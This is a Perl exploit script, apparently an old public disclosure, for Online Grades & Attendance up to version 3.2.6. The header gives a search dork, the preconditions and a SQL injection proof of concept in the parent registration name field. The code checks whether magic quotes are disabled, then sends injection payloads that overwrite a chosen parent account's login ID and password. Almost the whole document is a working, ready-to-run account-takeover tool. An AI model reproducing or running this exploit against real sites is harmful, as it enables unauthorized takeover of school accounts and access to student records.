#!/usr/bin/perl=0D
#-------------------------------------------------------------------------------------------------------------------=0D
#(Post Form --> Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades & Attendance v-3.2.6-->=0D
#-------------------------------------------------------------------------------------------------------------------=0D
#=0D
#CMS INFORMATION:=0D
#=0D
#-->WEB: http://www.onlinegrades.org/=0D 
#-->DOWNLOAD: http://www.onlinegrades.org/=0D 
#-->DEMO: http://www.onlinegrades.org/demo_info=0D 
#-->CATEGORY: CMS / Education=0D
#-->DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same=0D
#		features plus many new features. OG is a web based grade...=0D
#-->RELEASED: 2009-02-05=0D
#=0D
#CMS VULNERABILITY:=0D
#=0D
#-->TESTED ON: firefox 3=0D
#-->DORK: "Powered by Online Grades"	=0D
#-->CATEGORY: SQL INJECTION=0D
#-->AFFECT VERSION: <= 3.2.6=0D
#-->Discovered Bug date: 2009-05-21=0D
#-->Reported Bug date: 2009-05-21=0D
#-->Fixed bug date: Not fixed=0D
#-->Info patch: Not fixed=0D
#-->Author: YEnH4ckEr=0D
#-->mail: y3nh4ck3r[at]gmail[dot]com=0D
#-->WEB/BLOG: N/A=0D
#-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.=0D
#-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)=0D
#=0D
#=0D
#------------=0D
#CONDITIONS:=0D
#------------=0D
#=0D
#gpc_magic_quotes=OFF=0D
#=0D
#-----------------=0D
#PRE-REQUIREMENTS=0D
#-----------------=0D
#=0D
#Option --> Self Registration --> Allowed (Default value)=0D
#=0D
#-------=0D
#NEED:=0D
#-------=0D
#=0D
#Valid parent id=0D
#=0D
#---------------------------------------=0D
#PROOF OF CONCEPT (SQL INJECTION):=0D
#---------------------------------------=0D
#=0D
#Register module (name) is vuln to sql injection.=0D
#=0D
#Full name --> y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#=0D
#=0D
#Other parameters --> something=0D
#=0D
#=0D
#Return: Change client_id to 'owned' for parent id=1=0D
#=0D
#=0D
#######################################################################=0D
#######################################################################=0D
##*******************************************************************##=0D
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##=0D
##*******************************************************************##=0D
##-------------------------------------------------------------------##=0D
##*******************************************************************##=0D
##              GREETZ TO: SPANISH H4ck3Rs community!                ##=0D
##*******************************************************************##=0D
#######################################################################=0D
#######################################################################=0D
#=0D
#=0D
use LWP::UserAgent;=0D
use HTTP::Request;=0D
#Subroutines=0D
sub lw=0D
{=0D
	my $SO = $^O;=0D
	my $linux = "";=0D
	if (index(lc($SO),"win")!=-1){=0D
		$linux="0";=0D
	}else{=0D
		$linux="1";=0D
	}		=0D
	if($linux){=0D
		system("clear");=0D
	}=0D
	else{=0D
		system("cls");=0D
		system ("title Online Grades Attendance v-3.2.6 (Credentials changer) Exploit");=0D
		system ("color 02");=0D
	}=0D
}=0D
sub request {=0D
	my $userag = LWP::UserAgent->new;=0D
	$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');=0D
	if($_[2] eq "post"){=0D
		$request = HTTP::Request -> new(POST => $_[0]);=0D
		$request->referer($_[0]);=0D
		$request->content_type('application/x-www-form-urlencoded');=0D
		$request->content($_[1]);=0D
	}else{=0D
		$request = HTTP::Request -> new(GET => $_[0]);=0D
	}=0D
	my $outcode= $userag->request($request)->as_string;=0D
	return $outcode;=0D
}=0D
sub error {=0D
print "\t------------------------------------------------------------\n";=0D
	print "\tWeb isn't vulnerable!\n\n";=0D
	print "\t--->Maybe:\n\n";=0D
	print "\t\t1.-Patched.\n";=0D
	print "\t\t2.-Bad path or host.\n";=0D
	print "\t\tEXPLOIT FAILED!\n";=0D
	print "\t------------------------------------------------------------\n";=0D
}=0D
sub errormagicquotes {=0D
print "\t------------------------------------------------------------\n";=0D
	print "\tWeb isn't vulnerable!\n\n";=0D
	print "\t\tRaison--> Magic quotes ON.\n";=0D
	print "\t\tEXPLOIT FAILED!\n";=0D
	print "\t------------------------------------------------------------\n";=0D
}=0D
sub helper {=0D
	print "\n\t[!!!] Online Grades & Attendance <= v-3.2.6 (Credentials changer) Exploit\n";=0D
	print "\t[!!!] USAGE MODE: [!!!]\n";=0D
	print "\t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] [Target_id]\n";=0D
	print "\t[!!!] [HOST]: Web.\n";=0D
	print "\t[!!!] [PATH]: Home Path.\n";=0D
	print "\t[!!!] [Email Address]: Set value\n";=0D
	print "\t[!!!] [Password]: Set value\n";=0D
	print "\t[!!!] [Target_id]: victim id\n";=0D
print "\t[!!!] Example: perl $0 'www.onlinegrades.org' 'demo' 'y3nh4ck3r' 'y3nh4ck3r' '1' \n";=0D 
}=0D
#Main=0D
&lw;=0D
print "\t#######################################################\n\n";=0D
print "\t#######################################################\n\n";=0D
print "\t##        Online Grades & Attendance <= v-3.2.6      ##\n\n";=0D
print "\t##           (Credentials changer) Exploit           ##\n\n"; =0D
print "\t##         ++Conditions: magic_quotes=OFF            ##\n\n";=0D
print "\t##         ++Needed: Valid parent id                 ##\n\n";=0D
print "\t##               Author: Y3nh4ck3r                   ##\n\n";=0D
print "\t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##\n\n";=0D
print "\t##            Proud to be Spanish!                   ##\n\n";=0D
print "\t#######################################################\n\n";=0D
print "\t#######################################################\n\n";=0D
#Init variables=0D
my $host=$ARGV[0];=0D
my $path=$ARGV[1];=0D
my $client_id=$ARGV[2];=0D
my $client_pw=$ARGV[3];=0D
$numArgs = $#ARGV + 1;=0D
if($numArgs<=3) =0D
	{=0D
		&helper;=0D
		exit(1);	=0D
	}	=0D
	if(!$ARGV[4]){=0D
		$target_id=1;=0D
	}else{=0D
		$target_id=$ARGV[4];	=0D
	}=0D
=0D
#Build uri=0D
my $finalhost="http://".$host."/".$path."/parents/register.php?action=register";=0D 
my $phpinfo="http://".$host."/".$path."/include/phpinfo.php";=0D 
#sql injection	=0D
$injection="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_id='".$values."'#";=0D
$post="name=".$injection."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r";=0D
$output=&request($phpinfo,0,'get');=0D
if($output=~(/\\magic\_quotes\_gpc\<\/td\>\On\<\/td\>\On\<\/td\>\<\/tr\>/)){=0D
	&errormagicquotes;=0D
	exit(1);=0D
}=0D
$injection_email="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_id='".$client_id."'#";=0D
$post="name=".$injection_email."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r";=0D
$output=&request($finalhost, $post, 'post');=0D
$injection_pw="y3nh4ck3r', id=".$target_id." ON DUPLICATE KEY UPDATE client_pw='".$client_pw."'#";=0D
$post="name=".$injection_pw."&email=y3nh4ck3r%40gmail.com&pass1=y3nh4ck3r&pass2=y3nh4ck3r";=0D
$output=&request($finalhost, $post, 'post');=0D
#processed=0D
if($output!~(/\ERROR\<\/strong\>/))=0D
{  =0D
		print "\n\t-----------------------------------------------------------------\n";=0D
		print "\t--  EXPLOIT EXECUTED (Online Grades & Attendance <= v-3.2.6)   --\n";=0D
		print "\t--                  (Credentials changer) Exploit              --\n";=0D
		print "\t-----------------------------------------------------------------\n\n";=0D
		print "\t\tParent credentials changed!\n\n";=0D
		print "\t\tIf id doesn't exist, you add a new inconsistent user!\n\n";=0D
		print "\n\t<<<<<<----------------------FINISH!---------------->>>>>>>>\n\n";=0D
		print "\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\n\n";=0D
		print "\t<<<<<<-----------------------EOF-------------------->>>>>>>\n\n";=0D
}else{=0D
	&error;=0D
}=0D
exit(1);=0D
#Ok...all job done